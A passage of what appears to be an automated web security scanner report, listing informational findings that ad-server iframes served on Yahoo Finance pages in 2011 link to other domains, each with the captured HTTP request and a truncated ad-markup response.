GET /embed/457d7d7cd3cd82d66ba00fc48f756260/104.0.iframe.300x250/1315313295.31599?click=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bXRzM3ViNChnaWQkMnRvdkUwUERrampwQVJwalRsLndqUU9jTWhkN2FrNW1GbzRBRG5wUixzdCQxMzE1MzEzMjk0OTk3MjE0LHNpJDQ0NTEwNTEsdiQxLjAsYWlkJHdPdGtKMFBEbU9nLSxjdCQyNSx5YngkcG1naGl6R3VZYkg4WWxZa2VkWDdEUSxyJDAscmQkMTZpY3AwNHFzKSk/1/*http://global.ard.yahoo.com/SIG=15h8n21ld/M=999999.999999.999999.999999/D=fin/S=95993639:LREC/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=wOtkJ0PDmOg-/J=1315313295031599/K=kYjDTKuicqWfKJal7_1uqQ/A=3861873750735285092/R=0/X=6/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/q;_ylt=AsjqkoVImXcgcrWAEaC7OLbxVax_;_ylu=X3oDMTFhZzdpNWRjBHBvcwMxMgRzZWMDeWZpU3ltYm9sTG9va3VwUmVzdWx0cwRzbGsDeHNzZg--?s=XSS.F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_1=46:1542:790:131:0:55175:1315313288:L|46:675:22:0:0:55175:1315313098:L|40:409:178:0:0:50961:1315262572:B2; i_34=2:68:117:4:0:55175:1315313288:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 06 Sep 2011 12:48:17 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2995

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
<NOSCRIPT><a href="http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bXRzM3ViNChnaWQkMnRvdkUwUERrampwQVJwalRsLndqUU9jTWhkN2FrNW1GbzRBRG5wUixzdCQxMzE1MzEzMjk0OTk3MjE0LHNpJDQ0NTEwNTEsdiQxLjAsYWlkJHdPdGtKMFBEbU9nLSxjdCQyNSx5YngkcG1naGl6R3VZYkg4WWxZa2VkWDdEUSxyJDAscmQkMTZpY3AwNHFzKSk/1/*http://global.ard.yahoo.com/SIG=15h8n21ld/M=999999.999999.999999.999999/D=fin/S=95993639:LREC/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=wOtkJ0PDmOg-/J=1315313295031599/K=kYjDTKuicqWfKJal7_1uqQ/A=3861873750735285092/R=0/X=6/*http://ad.wsod.com/click/457d7d7cd3cd82d66ba00fc48f756260/104.0.iframe.300x250/" target="_blank" border="0" style="border:0px;"><img border="0" style="border:0px;" src="//ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/104.0.img.300x250/1315313297**;" />
...[SNIP]...

15.20. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/104.0.iframe.300x250/1315313297**  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/457d7d7cd3cd82d66ba00fc48f756260/104.0.iframe.300x250/1315313297**

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /embed/457d7d7cd3cd82d66ba00fc48f756260/104.0.iframe.300x250/1315313297**;10,3,183;1920;1200;http%3A_@2F_@2Ffinance.yahoo.com_@2Fq%3B_ylt%3DAsjqkoVImXcgcrWAEaC7OLbxVax_%3B_ylu%3DX3oDMTFhZzdpNWRjBHBvcwMxMgRzZWMDeWZpU3ltYm9sTG9va3VwUmVzdWx0cwRzbGsDeHNzZg--_@3Fs%3DXSS.F?click=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bXRzM3ViNChnaWQkMnRvdkUwUERrampwQVJwalRsLndqUU9jTWhkN2FrNW1GbzRBRG5wUixzdCQxMzE1MzEzMjk0OTk3MjE0LHNpJDQ0NTEwNTEsdiQxLjAsYWlkJHdPdGtKMFBEbU9nLSxjdCQyNSx5YngkcG1naGl6R3VZYkg4WWxZa2VkWDdEUSxyJDAscmQkMTZpY3AwNHFzKSk/1/*http://global.ard.yahoo.com/SIG=15h8n21ld/M=999999.999999.999999.999999/D=fin/S=95993639:LREC/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=wOtkJ0PDmOg-/J=1315313295031599/K=kYjDTKuicqWfKJal7_1uqQ/A=3861873750735285092/R=0/X=6/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/104.0.iframe.300x250/1315313295.31599?click=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bXRzM3ViNChnaWQkMnRvdkUwUERrampwQVJwalRsLndqUU9jTWhkN2FrNW1GbzRBRG5wUixzdCQxMzE1MzEzMjk0OTk3MjE0LHNpJDQ0NTEwNTEsdiQxLjAsYWlkJHdPdGtKMFBEbU9nLSxjdCQyNSx5YngkcG1naGl6R3VZYkg4WWxZa2VkWDdEUSxyJDAscmQkMTZpY3AwNHFzKSk/1/*http://global.ard.yahoo.com/SIG=15h8n21ld/M=999999.999999.999999.999999/D=fin/S=95993639:LREC/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=wOtkJ0PDmOg-/J=1315313295031599/K=kYjDTKuicqWfKJal7_1uqQ/A=3861873750735285092/R=0/X=6/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_1=46:1542:790:131:0:55175:1315313288:L|46:675:22:0:0:55175:1315313098:L|40:409:178:0:0:50961:1315262572:B2; i_34=2:68:117:4:0:55175:1315313288:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 06 Sep 2011 12:48:18 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_34=2:104:25:6:0:55175:1315313298:L|2:68:117:4:0:55175:1315313288:L; expires=Fri, 07-Oct-2011 12:48:18 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1471

   function wsod_image104() {
       document.write('<a href="http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bXRzM3ViNChnaWQkMnRvdkUwUERrampwQVJwalRsLndqUU9jTWhkN2FrNW1GbzRBRG5wUixzdCQxMzE1MzEzMjk0OTk3MjE0LHNpJDQ0NTEwNTEsdiQxLjAsYWlkJHdPdGtKMFBEbU9nLSxjdCQyNSx5YngkcG1naGl6R3VZYkg4WWxZa2VkWDdEUSxyJDAscmQkMTZpY3AwNHFzKSk/1/*http://global.ard.yahoo.com/SIG=15h8n21ld/M=999999.999999.999999.999999/D=fin/S=95993639:LREC/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=wOtkJ0PDmOg-/J=1315313295031599/K=kYjDTKuicqWfKJal7_1uqQ/A=3861873750735285092/R=0/X=6/*http://ad.doubleclick.net/click;h=v2|3E32|0|0|%2a|y;233976268;0-0;0;68150994;31-1|1;39902691|39920478|1;;;pc=WSOD%3fhttp://ad.wsod.com/click/457d7d7cd3cd82d66ba00fc48f756260/104.25.iframe.300x250/**;10.3183;1920;1200;http:_@2F_@2Ffinance.yahoo.com_@2Fq;_ylt=AsjqkoVImXcgcrWAEaC7OLbxVax_;_ylu=X3oDMTFhZzdpNWRjBHBvcwMxMgRzZWMDeWZpU3ltYm9sTG9va3VwUmVzdWx0cwRzbGsDeHNzZg--_@3Fs=XSS.F" target="_blank" title="Click to find out more!"><img style="border:none;" src="http://ad.wsodcdn.com/457d7d7cd3cd82d66ba00fc48f756260/PET_TMarketOppsStatic_300x250_100110.gif" alt="Click to find out more!" /></a>
...[SNIP]...

15.21. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313286070877  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313286070877

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313286070877?yud=smpv%3d3%26ed%3dKfb2BHkzcaa_Ez5Am4dvC37N1raRCR5h1JWlV.d5tpky0b8xMSZkytDAsrQiWlFiRI7KrmsgZd3dnvnG&encver=1&encalgo=3DES-CFB-SHA1&app=apt&intf=1&click=http://global.ard.yahoo.com/SIG=15ulf41ae/M=601843023.602979803.858295551.826566051/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=Dzb.VEPDkjnpARpjTl.wjQBoMhd7ak5mFoUADygs/B=oNrGPtGDJHI-/J=1315313286070877/K=URqeTfr3zDD1947mBh5eOA/A=3686351322249551559/R=0/X=3/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/lookup?s=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_1=46:675:22:0:0:55175:1315313098:L|40:409:178:0:0:50961:1315262572:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 06 Sep 2011 12:48:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2564

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
<NOSCRIPT><a href="http://global.ard.yahoo.com/SIG=15ulf41ae/M=601843023.602979803.858295551.826566051/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=Dzb.VEPDkjnpARpjTl.wjQBoMhd7ak5mFoUADygs/B=oNrGPtGDJHI-/J=1315313286070877/K=URqeTfr3zDD1947mBh5eOA/A=3686351322249551559/R=0/X=3/*http://ad.wsod.com/click/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/" target="_blank" border="0" style="border:0px;"><img border="0" style="border:0px;" src="//ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.img.120x60/1315313288**;" />
...[SNIP]...

15.22. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313288**  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313288**

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313288**;10,3,183;1920;1200;http%3A_@2F_@2Ffinance.yahoo.com_@2Flookup_@3Fs%3Dxss?yud=smpv%3d3%26ed%3dKfb2BHkzcaa_Ez5Am4dvC37N1raRCR5h1JWlV.d5tpky0b8xMSZkytDAsrQiWlFiRI7KrmsgZd3dnvnG&click=http://global.ard.yahoo.com/SIG=15ulf41ae/M=601843023.602979803.858295551.826566051/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=Dzb.VEPDkjnpARpjTl.wjQBoMhd7ak5mFoUADygs/B=oNrGPtGDJHI-/J=1315313286070877/K=URqeTfr3zDD1947mBh5eOA/A=3686351322249551559/R=0/X=3/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313286070877?yud=smpv%3d3%26ed%3dKfb2BHkzcaa_Ez5Am4dvC37N1raRCR5h1JWlV.d5tpky0b8xMSZkytDAsrQiWlFiRI7KrmsgZd3dnvnG&encver=1&encalgo=3DES-CFB-SHA1&app=apt&intf=1&click=http://global.ard.yahoo.com/SIG=15ulf41ae/M=601843023.602979803.858295551.826566051/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=Dzb.VEPDkjnpARpjTl.wjQBoMhd7ak5mFoUADygs/B=oNrGPtGDJHI-/J=1315313286070877/K=URqeTfr3zDD1947mBh5eOA/A=3686351322249551559/R=0/X=3/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_1=46:675:22:0:0:55175:1315313098:L|40:409:178:0:0:50961:1315262572:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 06 Sep 2011 12:48:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_34=2:68:117:4:0:55175:1315313288:L; expires=Fri, 07-Oct-2011 12:48:08 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1182

   function wsod_image68() {
       document.write('<a href="http://global.ard.yahoo.com/SIG=15ulf41ae/M=601843023.602979803.858295551.826566051/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=Dzb.VEPDkjnpARpjTl.wjQBoMhd7ak5mFoUADygs/B=oNrGPtGDJHI-/J=1315313286070877/K=URqeTfr3zDD1947mBh5eOA/A=3686351322249551559/R=0/X=3/*http://ad.doubleclick.net/click;h=v2|3D5D|0|0|%2a|t;234260563;0-0;0;58130593;31-1|1;39902686|39920473|1;;;pc=WSOD%3fhttp://ad.wsod.com/click/457d7d7cd3cd82d66ba00fc48f756260/68.117.iframe.120x60/yud*smpv=3|ed=Kfb2BHkzcaa_Ez5Am4dvC37N1raRCR5h1JWlV.d5tpky0b8xMSZkytDAsrQiWlFiRI7KrmsgZd3dnvnG**;10.3183;1920;1200;http:_@2F_@2Ffinance.yahoo.com_@2Flookup_@3Fs=xss" target="_blank" title="Click to find out more!"><img style="border:none;" src="http://ad.wsodcdn.com/457d7d7cd3cd82d66ba00fc48f756260/TR_LogoTextPO_No_120x60_Why_12.1.gif" alt="Click to find out more!" /></a>
...[SNIP]...

15.23. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313295039208  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313295039208

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313295039208?yud=smpv%3d3%26ed%3dKfb2BHkzcaa_Ez5Am4dvC37N1raRCR5h1JWlV.d5tpky0b8xMSZkytDAsrQiWlFiRI7KrmsgZd3dnvnG&encver=1&encalgo=3DES-CFB-SHA1&app=apt&intf=1&click=http://global.ard.yahoo.com/SIG=15sm6vod4/M=601843023.602979803.858295551.859733051/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=sWXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=3686351322249551559/R=0/X=3/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/q;_ylt=AsjqkoVImXcgcrWAEaC7OLbxVax_;_ylu=X3oDMTFhZzdpNWRjBHBvcwMxMgRzZWMDeWZpU3ltYm9sTG9va3VwUmVzdWx0cwRzbGsDeHNzZg--?s=XSS.F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_1=46:1542:790:131:0:55175:1315313288:L|46:675:22:0:0:55175:1315313098:L|40:409:178:0:0:50961:1315262572:B2; i_34=2:68:117:4:0:55175:1315313288:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 06 Sep 2011 12:48:17 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2560

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
<NOSCRIPT><a href="http://global.ard.yahoo.com/SIG=15sm6vod4/M=601843023.602979803.858295551.859733051/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=sWXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=3686351322249551559/R=0/X=3/*http://ad.wsod.com/click/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/" target="_blank" border="0" style="border:0px;"><img border="0" style="border:0px;" src="//ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.img.120x60/1315313297**;" />
...[SNIP]...

15.24. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313297**  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313297**

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313297**;10,3,183;1920;1200;http%3A_@2F_@2Ffinance.yahoo.com_@2Fq%3B_ylt%3DAsjqkoVImXcgcrWAEaC7OLbxVax_%3B_ylu%3DX3oDMTFhZzdpNWRjBHBvcwMxMgRzZWMDeWZpU3ltYm9sTG9va3VwUmVzdWx0cwRzbGsDeHNzZg--_@3Fs%3DXSS.F?yud=smpv%3d3%26ed%3dKfb2BHkzcaa_Ez5Am4dvC37N1raRCR5h1JWlV.d5tpky0b8xMSZkytDAsrQiWlFiRI7KrmsgZd3dnvnG&click=http://global.ard.yahoo.com/SIG=15sm6vod4/M=601843023.602979803.858295551.859733051/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=sWXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=3686351322249551559/R=0/X=3/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313295039208?yud=smpv%3d3%26ed%3dKfb2BHkzcaa_Ez5Am4dvC37N1raRCR5h1JWlV.d5tpky0b8xMSZkytDAsrQiWlFiRI7KrmsgZd3dnvnG&encver=1&encalgo=3DES-CFB-SHA1&app=apt&intf=1&click=http://global.ard.yahoo.com/SIG=15sm6vod4/M=601843023.602979803.858295551.859733051/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=sWXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=3686351322249551559/R=0/X=3/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_1=46:1542:790:131:0:55175:1315313288:L|46:675:22:0:0:55175:1315313098:L|40:409:178:0:0:50961:1315262572:B2; i_34=2:68:117:4:0:55175:1315313288:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 06 Sep 2011 12:48:17 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_34=2:68:103:4:0:55175:1315313297:L|2:68:117:4:0:55175:1315313288:L; expires=Fri, 07-Oct-2011 12:48:17 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1284

   function wsod_image68() {
       document.write('<a href="http://global.ard.yahoo.com/SIG=15sm6vod4/M=601843023.602979803.858295551.859733051/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=sWXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=3686351322249551559/R=0/X=3/*http://ad.doubleclick.net/click;h=v2|3D5D|0|0|%2a|t;234260563;0-0;0;58130593;31-1|1;39902686|39920473|1;;;pc=WSOD%3fhttp://ad.wsod.com/click/457d7d7cd3cd82d66ba00fc48f756260/68.103.iframe.120x60/yud*smpv=3|ed=Kfb2BHkzcaa_Ez5Am4dvC37N1raRCR5h1JWlV.d5tpky0b8xMSZkytDAsrQiWlFiRI7KrmsgZd3dnvnG**;10.3183;1920;1200;http:_@2F_@2Ffinance.yahoo.com_@2Fq;_ylt=AsjqkoVImXcgcrWAEaC7OLbxVax_;_ylu=X3oDMTFhZzdpNWRjBHBvcwMxMgRzZWMDeWZpU3ltYm9sTG9va3VwUmVzdWx0cwRzbGsDeHNzZg--_@3Fs=XSS.F" target="_blank" title="Click to find out more!"><img style="border:none;" src="http://ad.wsodcdn.com/457d7d7cd3cd82d66ba00fc48f756260/TR_Bullish Bar_120x60_s.gif" alt="Click to find out more!" /></a>
...[SNIP]...

15.25. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/0.22285940730944276  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/0.22285940730944276

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/0.22285940730944276?yhdata=ycg=&yyob=&zip=,&ybt=&click=http://global.ard.yahoo.com/SIG=15lcbbc7c/M=791401.14796848.14552986.4227981/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=s2XyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=6304038/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/q;_ylt=AsjqkoVImXcgcrWAEaC7OLbxVax_;_ylu=X3oDMTFhZzdpNWRjBHBvcwMxMgRzZWMDeWZpU3ltYm9sTG9va3VwUmVzdWx0cwRzbGsDeHNzZg--?s=XSS.F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_1=46:1542:790:131:0:55175:1315313288:L|46:675:22:0:0:55175:1315313098:L|40:409:178:0:0:50961:1315262572:B2; i_34=2:68:117:4:0:55175:1315313288:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 06 Sep 2011 12:48:17 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2510

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
<NOSCRIPT><a href="http://global.ard.yahoo.com/SIG=15lcbbc7c/M=791401.14796848.14552986.4227981/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=s2XyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=6304038/R=0/*http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/?yhdata=ycg=&yyob=&zip=,&ybt=&" target="_blank" border="0" style="border:0px;"><img border="0" style="border:0px;" src="//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.img.120x60/1315313297**;?yhdata=&ycg=&yyob=&zip=,&ybt=&" />
...[SNIP]...

15.26. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/0.3746751663275063  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/0.3746751663275063

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/0.3746751663275063?yhdata=ycg=&yyob=&zip=,&ybt=&click=http://global.ard.yahoo.com/SIG=15nir1qgd/M=791401.14796848.14552986.4227981/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=Dzb.VEPDkjnpARpjTl.wjQBoMhd7ak5mFoUADygs/B=otrGPtGDJHI-/J=1315313286070877/K=URqeTfr3zDD1947mBh5eOA/A=6304038/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/lookup?s=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_1=46:675:22:0:0:55175:1315313098:L|40:409:178:0:0:50961:1315262572:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 06 Sep 2011 12:48:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2514

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
